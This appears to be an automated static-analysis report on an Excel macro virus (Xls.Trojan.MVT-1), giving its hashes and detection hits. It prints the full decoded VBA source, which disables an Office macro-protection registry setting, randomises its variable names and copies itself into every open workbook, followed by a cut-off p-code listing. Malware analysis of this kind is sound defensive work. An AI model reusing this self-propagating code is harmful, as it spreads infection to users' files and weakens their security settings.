Xls.Trojan.MVT-1 — Office (OLE) malware analysis

Static analysis result for SHA-256 0c777875d33912d4…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 25.0 KB
Created: 1999-08-28 15:09:24
Authoring application: Microsoft Excel
First seen: 2012-06-14
MD5: 62feba7ad7eedd37618fa95fe66c9159
SHA-1: ed0273b12de662ba27a34ca941b086c06fb48029
SHA-256: 0c777875d33912d4c525c74c727a56d5c7fb2cf881d92783076ff14d8b126e97
Risk Score: 180

Malware Insights

Xls.Trojan.MVT-1 · confidence 90%

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The sample is identified as Xls.Trojan.MVT-1 by ClamAV, indicating malicious intent. The VBA macro code utilizes `CreateObject` to interact with Word and attempts to modify other workbooks by injecting its code, suggesting a propagation or downloader mechanism. The macro also contains obfuscated code and string manipulation, typical of malware attempting to evade detection.

Heuristics 3

  • ClamAV: Xls.Trojan.MVT-1 (severity: critical, rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Xls.Trojan.MVT-1
  • VBA macros detected (severity: medium, rule: OLE_VBA_MACROS, 1 related finding)
    Document contains VBA macro code
  • CreateObject call (severity: high, rule: OLE_VBA_CREATEOBJ)
    CreateObject call

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 7417 bytes
SHA-256: 0457a95a9d9453e2a0a4c7338eef0ad8b326b09365321b2cf100c899c8256289
Detection: ClamAV: Xls.Trojan.MVT-1
Obfuscation or payload: unlikely

First 1,000 lines of the extracted script:

Attribute VB_Name = "DieseArbeitsmappe"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Deactivate() 'Fr33d0m
Set OBJ = CreateObject("word.application"): OBJ.system.privateprofilestring("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel", "Options6") = &H0: OBJ.Quit
FULLCODE = ThisWorkbook.VBProject.VBComponents("DieseArbeitsmappe").CodeModule.Lines(1, 15)
Dim VARIABLE(1 To 8)
VARIABLE(1) = "OBJ": VARIABLE(2) = "FULLCODE": VARIABLE(3) = "VARIABLE": VARIABLE(4) = "OUR_LOOP": VARIABLE(5) = "NEW_VAR": VARIABLE(6) = "VAR_POSITION": VARIABLE(7) = "NEXT_ONE": VARIABLE(8) = "TARGET"
For OUR_LOOP = 1 To 8
NEW_VAR = Chr(65 + Int(Rnd * 22)) & Chr(122 - Int(Rnd * 22)) & Int(Rnd * 999)
VAR_POSITION = 1
NEXT_ONE: VAR_POSITION = InStr(VAR_POSITION, FULLCODE, VARIABLE(OUR_LOOP))
If VAR_POSITION <> 0 Then FULLCODE = Mid(FULLCODE, 1, (VAR_POSITION - 1)) & NEW_VAR & Mid(FULLCODE, (VAR_POSITION + Len(VARIABLE(OUR_LOOP))), Len(FULLCODE)): GoTo NEXT_ONE
Next
For Each TARGET In Workbooks
If TARGET.VBProject.VBComponents("DieseArbeitsmappe").CodeModule.Lines(1, 1) <> "Private Sub Workbook_Deactivate() 'Fr33d0m" Then TARGET.VBProject.VBComponents("DieseArbeitsmappe").CodeModule.AddFromString FULLCODE: TARGET.SaveAs TARGET.FullName
Next
If Minute(Now()) = Second(Now()) Then MsgBox ThisWorkbook.VBProject.VBComponents("DieseArbeitsmappe").CodeModule.Lines(17, 7), 0, "Class.Freed0m by jackie twoflower /Lz0NT /MVT /CC"
End Sub
' Remorse in all forms will be removed from human thoughts
' and actions. Freedom will only be available through revolution
' or death. This system of a down is unavoidable as life on
' this planet becomes unneccessary.

' Open your eyes, open your mouths, close your hands and
' make a fist!

Attribute VB_Name = "Tabelle1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Tabelle2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Tabelle3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

' Processing file: /opt/analyzer/scan_staging/32c7b463a9104523b874d31bda5a0706.bin
' ===============================================================================
' Module streams:
' _VBA_PROJECT_CUR/VBA/DieseArbeitsmappe - 7328 bytes
' Line #0:
' 	FuncDefn (Private Sub Workbook_Deactivate())
' 	QuoteRem 0x0022 0x0007 "Fr33d0m"
' Line #1:
' 	SetStmt 
' 	LitStr 0x0010 "word.application"
' 	ArgsLd CreateObject 0x0001 
' 	Set OBJ 
' 	BoS 0x0000 
' 	LitHI2 0x0000 
' 	LitStr 0x0000 ""
' 	LitStr 0x0045 "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel"
' 	LitStr 0x0008 "Options6"
' 	Ld OBJ 
' 	MemLd system 
' 	ArgsMemSt privateprofilestring 0x0003 
' 	BoS 0x0000 
' 	Ld OBJ 
' 	ArgsMemCall Quit 0x0000 
' Line #2:
' 	LitDI2 0x0001 
' 	LitDI2 0x000F 
' 	LitStr 0x0011 "DieseArbeitsmappe"
' 	Ld ThisWorkbook 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd CodeModule 
' 	ArgsMemLd Lines 0x0002 
' 	St FULLCODE 
' Line #3:
' 	Dim 
' 	LitDI2 0x0001 
' 	LitDI2 0x0008 
' 	VarDefn VARIABLE
' Line #4:
' 	LitStr 0x0003 "OBJ"
' 	LitDI2 0x0001 
' 	ArgsSt VARIABLE 0x0001 
' 	BoS 0x0000 
' 	LitStr 0x0008 "FULLCODE"
' 	LitDI2 0x0002 
' 	ArgsSt VARIABLE 0x0001 
' 	BoS 0x0000 
' 	LitStr 0x0008 "VARIABLE"
' 	LitDI2 0x0003 
' 	ArgsSt VARIABLE 0x0001 
' 	BoS 0x0000 
' 	LitStr 0x0008 "OUR_LOOP"
' 	LitDI2 0x0
... (truncated)